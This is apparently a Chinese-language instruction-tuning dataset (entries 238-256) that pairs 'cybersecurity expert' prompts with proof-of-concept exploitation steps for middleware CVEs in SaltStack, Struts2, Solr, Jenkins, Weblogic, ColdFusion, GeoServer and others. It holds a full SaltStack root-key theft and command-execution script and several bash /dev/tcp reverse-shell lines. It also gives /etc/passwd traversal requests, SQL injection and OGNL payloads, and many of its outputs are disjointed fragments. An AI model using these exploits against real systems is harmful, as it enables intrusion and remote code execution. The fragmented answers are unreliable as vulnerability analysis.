  238. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Solr JMX服务 RCE CVE-2019-12409\n漏洞描述:Java ManagementExtensions(JMX)是一种Java技术,为管理和监视应用程序、系统对象、设备(如打印机)和面向服务的网络提供相应的工具。JMX 作为 Java的一种Bean管理机制,如果JMX服务端口暴露,那么远程攻击者可以让该服务器远程加载恶意的Bean文件,随着Bean的滥用导致远程代码执行。\n影响版本:``` Apache Solr 8.1.1 Apache Solr 8.2.0 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2019-12409\n【POC利用方法】\n1. Apache Solr 8.1.1\nApache Solr 8.2.0\n2. docker pull solr:8.2.0\ndocker run --name solr -d -p 8983:8983 -t solr:8.2.0\n3. nmap xxx.xxx.xxx.xxx -p 18983\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Solr JMX服务 RCE CVE-2019-12409.md"}
    239. 

  239. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Node.js 目录穿越漏洞 CVE-2017-14849\n漏洞描述:参考文档: - https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/ - https://security.tencent.com/index.php/blog/msg/121 原因是 Node.js 8.5.0 对目录进行`normalize`操作时出现了逻辑错误,导致向上层跳跃的时候(如`../../../../../../etc/passwd`),在中间位置增加`foo/../`(如`../../../foo/../../../../etc/passwd`),即可使`normalize`返回`/etc/passwd`,但实际上正确结果应该是`../../../../../../etc/passwd`。 express这类web框架,通常会提供了静态文件服务器的功能,这些功能依赖于`normalize`函数。比如,express在判断path是否超出静态目录范围时,就用到了`normalize`函数,上述BUG导致`normalize`函数返回错误结果导致绕过了检查,造成任意文件读取漏洞。 当然,`normalize`的BUG可以影响的绝非仅有express,更有待深入挖掘。不过因为这个BUG是node 8.5.0 中引入的,在 8.6 中就进行了修复,所以影响范围有限。\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2017-14849\n【POC利用方法】\n1. docker-compose build\ndocker-compose up -d\n2. GET /static/../../../a/../../../../etc/passwd HTTP/1.1\nHost: your-ip:3000\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\nConnection: close\n3. GET /static/../../../a/../../../../etc/passwd HTTP/1.1\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Node.js 目录穿越漏洞 CVE-2017-14849.md"}
    240. 

  240. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271\n漏洞描述:Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。\n影响版本:``` Weblogic 10.3.6.0.0 Weblogic 12.1.3.0.0 Weblogic 12.2.1.0.0 Weblogic 12.2.1.2.0 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2017-10271\n【POC利用方法】\n1. Weblogic 10.3.6.0.0\nWeblogic 12.1.3.0.0\nWeblogic 12.2.1.0.0\nWeblogic 12.2.1.2.0\n2. git clone https://github.com/vulhub/vulhub.git\ncd vulhub/weblogic/CVE-2017-10271\ndocker-compose up -d\n3. /wls-wsat/CoordinatorPortType\n/wls-wsat/RegistrationPortTypeRPC\n/wls-wsat/ParticipantPortType\n/wls-wsat/RegistrationRequesterPortType\n/wls-wsat/CoordinatorPortType11\n/wls-wsat/RegistrationPortTypeRPC11\n/wls-wsat/ParticipantPortType11\n/wls-wsat/RegistrationRequesterPortType11\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271.md"}
    241. 

  241. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:SaltStack 水平权限绕过漏洞 CVE-2020-11651\n漏洞描述:SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。国外某安全团队披露了 SaltStack 存在认证绕过漏洞(CVE-2020-11651)和目录遍历漏洞(CVE-2020-11652)。 在 CVE-2020-11651 认证绕过漏洞中,攻击者通过构造恶意请求,可以绕过 Salt Master 的验证逻辑,调用相关未授权函数功能,从而可以造成远程命令执行漏洞。 参考链接: - https://labs.f-secure.com/advisories/saltstack-authorization-bypass - https://github.com/rossengeorgiev/salt-security-backports - https://github.com/saltstack/salt/blob/a67d76b15615983d467ed81371b38b4a17e4f3b7/tests/integration/master/test_clear_funcs.py\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2020-11651\n【POC利用方法】\n1. docker-compose up -d\n2. {'cmd': '_prep_auth_info'}\n3. #!/usr/bin/env python3\n\n# POC for exploiting CVE-2020-11651. CVE-2020-11652 not included, but this one is the really powerful one and it should be easy enough to figure out how to get 11652 working if you need.\n# Author: @dozernz\n# Some code adapted from https://github.com/rossengeorgiev/salt-security-backports\n#\n# Pre-requsities: pip3 install salt\n\n\nimport os\nimport sys\n\nimport salt\nimport salt.version\nimport salt.transport.client\nimport salt.exceptions\nimport datetime\n\n\ndef ping_master():\n    print(\"Attempting to ping master at \"+master_ip)\n    try:\n        msg = {\"cmd\":\"ping\"}\n        response = clear_channel.send(msg, timeout=3)\n        if response:\n            return True\n    except salt.exceptions.SaltReqTimeoutError:\n        return False\n\n    return False\n\n\ndef get_rootkey():\n    try:\n        response = clear_channel.send({'cmd':'_prep_auth_info'}, timeout=2)\n        for i in response:\n            if isinstance(i,dict) and len(i) == 1:\n                rootkey = list(i.values())[0]\n                print(\"Retrieved root key: \" + rootkey)\n                return rootkey\n\n        return False\n        \n    except:\n        return False\n\n\ndef send_command_to_minions(command):\n    print(\"Sending command to all minions on master\")\n    jid = \"{0:%Y%m%d%H%M%S%f}\".format(datetime.datetime.utcnow())\n    cmd = \"/bin/sh -c '{0}'\".format(command)\n\n    msg = {'cmd':\"_send_pub\",\"fun\":\"cmd.run\",\"arg\":[cmd],\"tgt\":\"*\",\"ret\":\"\",\"tgt_type\":\"glob\",\"user\":\"root\",\"jid\":jid}\n\n    try:\n        response = clear_channel.send(msg,timeout=3)\n        if response == None:\n            return True\n        else:\n            return False\n    except:\n        return False\n\n\n\ndef master_shell(root_key,command):\n    # This is achieved by using the stolen key to create a \"runner\" on the master node using the cmdmod module, then the cmd.exec_code function to run some python3 code that shells out.\n    # There is a cmd.shell function but I wasn't able to get it to accept the \"cmd\" kwarg parameter for some reason.\n    # It's also possible to use CVE-2020-11652 to get shell if the master instance is running as root by writing a crontab into a cron directory, or proably some other ways.\n    # This way is nicer though, and doesn't need the master to be running as root .\n\n\n    msg = {\"key\":root_key,\n            \"cmd\":\"runner\",\n            'fun': 'salt.cmd',\n            \"kwarg\":{\n                \"fun\":\"cmd.exec_code\",\n                \"lang\":\"python3\",\n                \"code\":\"import subprocess;subprocess.call('{}',shell=True)\".format(command)\n                },\n            'jid': '20200504042611133934',\n            'user': 'sudo_user',\n            '_stamp': '2020-05-04T04:26:13.609688'}\n\n    try:\n        response = clear_channel.send(msg,timeout=3)\n        print(\"Got response for attempting master shell: \"+str(response)+ \". Looks promising!\")\n        return True\n    except:\n        print(\"something failed\")\n        return False\n\n\n\nif __name__==\"__main__\":\n    if len(sys.argv) <= 2:\n        print(\"Not enough args\")\n        print(\"Use like python3 cve-2020-11651.py <targetip> <master/minions/fetchkeyonly> <command>\")\n        sys.exit(1)\n    \n    \n    target = sys.argv[1]\n    master_minion_root = sys.argv[2]\n\n\n    master_ip = target\n    master_port = '4506'\n\n    minion_config = {\n\n    'transport': 'zeromq',\n    'pki_dir': '/tmp',\n    'id': 'root',\n    'log_level': 'debug',\n    'master_ip': master_ip,\n    'master_port': master_port,\n    'auth_timeout': 5,\n    'auth_tries': 1,\n    'master_uri': 'tcp://{0}:{1}'.format(master_ip, master_port)\n    }\n\n    clear_channel = salt.transport.client.ReqChannel.factory(minion_config, crypt='clear')\n\n    if not ping_master():\n        print(\"Failed to ping the specified master server, exiting\")\n        sys.exit(1)\n\n\n    if master_minion_root == \"master\" or master_minion_root == \"minions\":\n        command = sys.argv[3]\n        rootkey = get_rootkey()\n        if not rootkey:\n            print(\"Failed to fetch the root key from the instance. This MAY indicate that it is patched\")\n            sys.exit(1)\n        else:\n            if master_minion_root == \"master\":\n                master_shell(rootkey,command)\n            else:\n                send_command_to_minions(command)\n\n    elif master_minion_root == \"fetchkeyonly\":\n        get_rootkey()\n\n    else:\n        print(\"Invalid usage\")\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/SaltStack 水平权限绕过漏洞 CVE-2020-11651.md"}
    242. 

  242. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache HTTPd 路径穿越漏洞 CVE-2021-42013\n漏洞描述:Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.49~2.4.50-本中存在一个漏洞,可读取服务器中的任意文件 (CVE-2021-41773 的漏洞绕过)\n影响版本:``` Apache HTTPd 2.4.49~2.4.50版本 ```\n网络测绘:``` server=\"Apache/2.4.49\" ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2021-42013\n【POC利用方法】\n1. Apache HTTPd 2.4.49~2.4.50版本\n2. server=\"Apache/2.4.49\"\n3. /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache HTTPd 路径穿越漏洞 CVE-2021-42013.md"}
    243. 

  243. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Struts2 S2-045 远程代码执行漏洞 CVE-2017-5638\n漏洞描述:基于Jakarta Multipart parser的文件上传模块在处理文件上传(multipart)的请求时候对异常信息做了捕获,并对异常信息做了OGNL表达式处理。但在在判断content-type不正确的时候会抛出异常并且带上Content-Type属性值,可通过精心构造附带OGNL表达式的URL导致远程代码执行。 漏洞详情: - http://struts.apache.org/docs/s2-045.html - https://blog.csdn.net/u011721501/article/details/60768657 - https://paper.seebug.org/247/\n影响版本:影响版本: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2017-5638\n【POC利用方法】\n1. docker-compose build\ndocker-compose up -d\n2. POST / HTTP/1.1\nHost: localhost:8080\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.8,es;q=0.6\nConnection: close\nContent-Length: 0\nContent-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',233*233)}.multipart/form-data\n3. echo \"bash -i >& /dev/tcp/192.168.174.128/9999 0>&1\" > shell.sh\npython3环境下:python -m http.server 80\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Struts2 S2-045 远程代码执行漏洞 CVE-2017-5638.md"}
    244. 

  244. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache SSI 远程命令执行漏洞\n漏洞描述:在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个shtml文件,并利用`<!--#exec cmd=\"id\" -->`语法执行任意命令。 参考链接: - https://httpd.apache.org/docs/2.4/howto/ssi.html - https://www.w3.org/Jigsaw/Doc/User/SSI.html\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【POC利用方法】\n1. docker-compose up -d\n2. # 第一次写入webshell文件\n<!--#exec cmd=\"echo 'bash -i >& /dev/tcp/192.168.174.128/9999 0>&1' > /var/www/html/shell.sh\"-->\n# 第二次修改webshell权限\n<!--#exec cmd=\"chmod +x /var/www/html/shell.sh\"-->\n# 第三次执行webshell\n<!--#exec cmd=\"/bin/bash /var/www/html/shell.sh\"-->\n3. - https://www.w3.org/Jigsaw/Doc/User/SSI.html\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache SSI 远程命令执行漏洞.md"}
    245. 

  245. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Kylin DiagnosisController.java 命令注入漏洞 CVE-2020-13925\n漏洞描述:6月,京东安全的蓝军团队发现了一个 apache kylin 远程命令执行严重漏洞( CVE-2020-13925)。黑客可以利用这个漏洞,登录任何管理员账号和密码默认未修改的账号,获得管理员权限。由于Apache Kylin被广泛应用于企业的大数据分析平台,因此该漏洞将对企业核心数据具有较大的危害,存在数据泄露风险,建议用户尽快升级软件至安全版本。\n影响版本:``` Apache Kylin 2.3.0 ~ 2.3.2 Apache Kylin 2.4.0 ~ 2.4.1 Apache Kylin 2.5.0 ~ 2.5.2 Apache Kylin 2.6.0 ~ 2.6.5 Apache Kylin 3.0.0-alpha ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2020-13925\n【POC利用方法】\n1. Apache Kylin 2.3.0 ~ 2.3.2\nApache Kylin 2.4.0 ~ 2.4.1\nApache Kylin 2.5.0 ~ 2.5.2\nApache Kylin 2.6.0 ~ 2.6.5\nApache Kylin 3.0.0-alpha\n2. docker pull apachekylin/apache-kylin-standalone:3.0.1\n\ndocker run -d \\\n-m 8G \\\n-p 7070:7070 \\\n-p 8088:8088 \\\n-p 50070:50070 \\\n-p 8032:8032 \\\n-p 8042:8042 \\\n-p 16010:16010 \\\napachekylin/apache-kylin-standalone:3.0.1\n3. /**\n     * Get diagnosis information for project\n     */\n    @RequestMapping(value = \"/project/{project}/download\", method = { RequestMethod.GET }, produces = {\n            \"application/json\" })\n    @ResponseBody\n    public void dumpProjectDiagnosisInfo(@PathVariable String project, final HttpServletRequest request,\n            final HttpServletResponse response) {\n        try (AutoDeleteDirectory diagDir = new AutoDeleteDirectory(\"diag_project\", \"\")) {\n            String filePath = dgService.dumpProjectDiagnosisInfo(project, diagDir.getFile());\n            setDownloadResponse(filePath, response);\n        } catch (IOException e) {\n            throw new InternalErrorException(\"Failed to dump project diagnosis info. \" + e.getMessage(), e);\n        }\n\n    }\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Kylin DiagnosisController.java 命令注入漏洞 CVE-2020-13925.md"}
    246. 

  246. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Solr 代码执行漏洞 CNVD-2023-27598\n漏洞描述:Solr 以 Solrcloud 模式启动且可出网时,未经身份验证的远程攻击者可以通过发送特制的数据包进行利用,最终在目标系统上远程执行任意代码。\n影响版本:``` 8.10.0 <= Apache Solr < 9.2.0 ```\n网络测绘:``` app=\"APACHE-Solr\" ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【POC利用方法】\n1. 8.10.0 <= Apache Solr < 9.2.0\n2. app=\"APACHE-Solr\"\n3. POST /solr/demo/config HTTP/1.1\nHost: 192.168.1.92:8983\nContent-Length: 180\nContent-Type: application/json\n\n{\"add-listener\":{\"event\":\"postCommit\",\"name\":\"suiyi\",\"class\":\"solr.RunExecutableListener\",\"exe\":\"bash\",\"dir\":\"/bin/\",\"args\":[\"-c\", \"bash -i >& /dev/tcp/your-ip/9999 0>&1\"]}}\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Solr 代码执行漏洞 CNVD-2023-27598.md"}
    247. 

  247. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:GeoServer OGC Filter SQL注入漏洞 CVE-2023-25157\n漏洞描述:GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作。 在版本2.22.1和2.21.4及以前,多个OGC表达式中均存在SQL注入漏洞。 参考链接: - https://github.com/murataydemir/CVE-2023-25157-and-CVE-2023-25158 - https://github.com/advisories/GHSA-7g5f-wrx8-5ccf\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2023-25157\n【POC利用方法】\n1. docker compose up -d\n2. http://your-ip:8080/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith%28name%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+integer%29%29+--+%27%29+%3D+true\n3. - https://github.com/murataydemir/CVE-2023-25157-and-CVE-2023-25158\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/GeoServer OGC Filter SQL注入漏洞 CVE-2023-25157.md"}
    248. 

  248. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Jenkins 远程命令执行漏洞 CVE-2018-1000861\n漏洞描述:Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。 参考链接: - http://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html - http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html - https://0xdf.gitlab.io/2019/02/27/playing-with-jenkins-rce-vulnerability.html\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2018-1000861\n【POC利用方法】\n1. docker-compose up -d\n2. http://your-ip:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript\n?sandbox=true\n&value=public class x {\n  public x(){\n    \"touch /tmp/success\".execute()\n  }\n}\n3. - http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Jenkins 远程命令执行漏洞 CVE-2018-1000861.md"}
    249. 

  249. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Weblogic uddiexplorer SSRF漏洞 CVE-2014-4210\n漏洞描述:Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。\n影响版本:``` Oracle WebLogic Server 10.0.2.0 Oracle WebLogic Server 10.3.6.0 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2014-4210\n【POC利用方法】\n1. Oracle WebLogic Server 10.0.2.0\nOracle WebLogic Server 10.3.6.0\n2. docker-compose up -d\n3. GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001 HTTP/1.1\nHost: your-vps-ip:7001\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\nConnection: close\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Weblogic uddiexplorer SSRF漏洞 CVE-2014-4210.md"}
    250. 

  250. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Rsync 未授权访问漏洞\n漏洞描述:Rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【POC利用方法】\n1. docker-compose build\ndocker-compose up -d\n2. rsync rsync://your-ip:873/\n3. rsync rsync://your-ip:873/src/\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Rsync 未授权访问漏洞.md"}
    251. 

  251. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:GoAhead Server 环境变量注入 CVE-2021-42342\n漏洞描述:GoAhead是一个开源(商业许可)、简单、轻巧、功能强大、可以在多个平台运行的Web Server,多用于嵌入式系统、智能设备。其支持运行ASP、Javascript和标准的CGI程序。 这个漏洞是[CVE-2017-17562](https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562)漏洞补丁的绕过,攻击者可以利用该补丁没有考虑到的multipart表单控制目标服务器的环境变量,进而劫持`LD_PRELOAD`来执行任意代码。 参考链接: - https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562 - https://ahmed-belkahla.me/post/2-methods-rce-0-day-in-goahead-webserver-pbctf-2021/ - https://mp.weixin.qq.com/s/AS9DHeHtgqrgjTb2gzLJZg\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2021-42342\n【POC利用方法】\n1. docker-compose up -d\n2. #include <unistd.h>\n\nstatic void before_main(void) __attribute__((constructor));\n\nstatic void before_main(void)\n{\n    write(1, \"Hello: World\\r\\n\\r\\n\", 16);\n    write(1, \"Hacked\\n\", 7);\n}\n3. gcc -s -shared -fPIC ./payload.c -o payload.so\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/GoAhead Server 环境变量注入 CVE-2021-42342.md"}
    252. 

  252. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Struts2 S2-009 远程代码执行漏洞\n漏洞描述:> 前置阅读: 这个漏洞再次来源于s2-003、s2-005。了解该漏洞原理,需要先阅读s2-005的说明:https://github.com/phith0n/vulhub/blob/master/struts2/s2-005/README.md 参考[Struts2漏洞分析之Ognl表达式特性引发的新思路](https://www.t00ls.net/viewthread.php?tid=21197),文中说到,该引入ognl的方法不光可能出现在这个漏洞中,也可能出现在其他java应用中。 Struts2对s2-003的修复方法是禁止静态方法调用,在s2-005中可直接通过OGNL绕过该限制,对于`#`号,同样使用编码`\\u0023`或`\\43`进行绕过;于是Struts2对s2-005的修复方法是禁止`\\`等特殊符号,使用户不能提交反斜线。 但是,如果当前action中接受了某个参数`example`,这个参数将进入OGNL的上下文。所以,我们可以将OGNL表达式放在`example`参数中,然后使用`/helloword.acton?example=<OGNL statement>&(example)('xxx')=1`的方法来执行它,从而绕过官方对`#`、`\\`等特殊字符的防御。 漏洞详情: - http://struts.apache.org/docs/s2-009.html\n影响版本:影响版本: 2.1.0 - 2.3.1.1\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【POC利用方法】\n1. docker-compose build\ndocker-compose up -d\n2. public class Example5Action extends ActionSupport {\n\n    private static final long serialVersionUID = 2111967621952300611L;\n\n    private String name;\n    private Integer age;\n\n\n    public String getName() { return name; }\n    public void setName(String name) { this.name = name; }\n\n    public Integer getAge() { return age; }\n    public void setAge(Integer age) { this.age = age; }\n\n    @Override\n    public String execute() throws Exception {\n        return SUCCESS;\n    }\n}\n3. <package name=\"ajax\" extends=\"struts-default\">\n    ...\n    <action name=\"example5\" class=\"org.apache.struts2.showcase.ajax.Example5Action\">\n        <result name=\"input\">/ajax/tabbedpanel/example5.jsp</result>\n        <result>/ajax/tabbedpanel/example5Ok.jsp</result>\n    </action>\n    ...\n</package>\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Struts2 S2-009 远程代码执行漏洞.md"}
    253. 

  253. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Axis 远程代码执行漏洞\n漏洞描述:Apache Axis 服务被用于部署各种接口服务。其中,AdminService 接口允许管理员远程访问管理服务,相关配置在 `/axis/WEB-INF/server-config.wsdd`(部署应用后产生),其中`enableRemoteAdmin`默认为`false`,只允许本地管理。 若将`enableRemoteAdmin`设置为`true`,则可以执行 JNDI 注入,执行任意代码或反弹 Shell。\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【POC利用方法】\n1. vim ~/.profile\n2. export AXIS_HOME=/usr/tomcat/apache-tomcat-8.5.90/webapps/axis\nexport AXIS_LIB=$AXIS_HOME/WEB-INF/lib\nexport AXISCLASSPATH=$AXIS_LIB/axis.jar:$AXIS_LIB/commons-discovery-0.2.jar:$AXIS_LIB/commons-logging-1.0.4.jar:$AXIS_LIB/jaxrpc.jar:$AXIS_LIB/saaj.jar:$AXIS_LIB/log4j-1.2.8.jar:$AXIS_LIB/xml-apis.jar:$AXIS_LIB/xercesImpl.jar:$AXIS_LIB/wsdl4j-1.5.1.jar\n3. source ~/.profile\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Axis 远程代码执行漏洞 CVE-2019-0227.md"}
    254. 

  254. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Adobe ColdFusion 本地文件包含漏洞 CVE-2023-26360\n漏洞描述:Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 Adobe ColdFusion 2018 Update 15 和 2021 Update 5 版本及以前,存在一处文件包含漏洞。攻击者可以利用该漏洞在服务器上执行任意代码。 参考链接: - [https://xz.aliyun.com/t/13392](https://xz.aliyun.com/t/13392)\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2023-26360\n【POC利用方法】\n1. docker compose up -d\n2. POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=foo&_cfclient=true HTTP/1.1\nHost: your-vps-ip:8500\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\nContent-Length: 82\nContent-Type: application/x-www-form-urlencoded\n\n_variables={\"_metadata\":{\"classname\":\"../../../../../../../../proc/self/environ\"}}\n3. POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=foo&_cfclient=true HTTP/1.1\nHost: your-vps-ip:8500\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\nContent-Length: 67\nContent-Type: application/x-www-form-urlencoded\n\n_variables=<cfexecute name='id' outputFile='/tmp/awesome_poc' ></cfexecute>\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Adobe ColdFusion 本地文件包含漏洞 CVE-2023-26360.md"}
    255. 

  255. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:GoCD plugin 任意文件读取漏洞 CVE-2021-43287\n漏洞描述:*GoCD*,一个开源的持续集成和持续交付系统,可以在持续交付过程中执行编译,自动化测试,自动部署等等,与Jenkins类似。 GoCD plugin aip 参数中的 pluginName 参数存在任意文件读取漏洞,导致攻击者可以获取服务器中的任意敏感信息\n影响版本:``` GoCD ```\n网络测绘:``` title=\"Create a pipeline - Go\" ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2021-43287\n【POC利用方法】\n1. title=\"Create a pipeline - Go\"\n2. /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/GoCD plugin 任意文件读取漏洞 CVE-2021-43287.md"}
    256. 

  256. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:OpenSSL 心脏出血漏洞 CVE-2014-0160\n漏洞描述:在OpenSSL1.0.1版本中存在严重漏洞(CVE-2014-0160),此次漏洞问题存在于ssl/dl_both.c文件中。OpenSSL Heartbleed模块存在一个BUG,当攻击者构造一个特殊的数据包,满足用户心跳包中无法提供足够多的数据,会导致memcpy把SSLv3记录之后的数据直接输出,该漏洞导致攻击者可以远程读取存在漏洞版本的openssl服务器内存中长大64K的数据。 心脏出血是一个内存漏洞,攻击者利用这个漏洞可以服务到目标进程内存信息,如其他人的Cookie等敏感信息。 参考链接: - https://heartbleed.com/ - https://filippo.io/Heartbleed\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2014-0160\n【POC利用方法】\n1. docker-compose up -d\n2. nmap -sV -p 443 --script ssl-heartbleed.nse your-ip\n3. #!/usr/bin/python\n\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)\n# The author disclaims copyright to this source code.\n\nimport sys\nimport struct\nimport socket\nimport time\nimport select\nimport binascii\nimport re\nfrom optparse import OptionParser\n\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\n\ndef h2bin(x):\n    return binascii.unhexlify(x.replace(' ', '').replace('\\n', ''))\n\nhello = 